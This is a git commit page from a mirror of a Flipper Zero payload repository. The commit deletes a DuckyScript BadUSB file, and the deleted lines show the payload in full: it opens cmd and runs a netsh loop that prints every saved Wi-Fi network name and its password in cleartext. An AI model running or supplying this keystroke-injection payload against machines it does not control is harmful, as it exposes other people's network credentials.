mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Delete Show_WiFi_Passwords.txt
This commit is contained in:
parent
5e51f71cc6
commit
e61bd5779d
@ -1,10 +0,0 @@
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING cmd
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
|
||||
DELAY 250
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user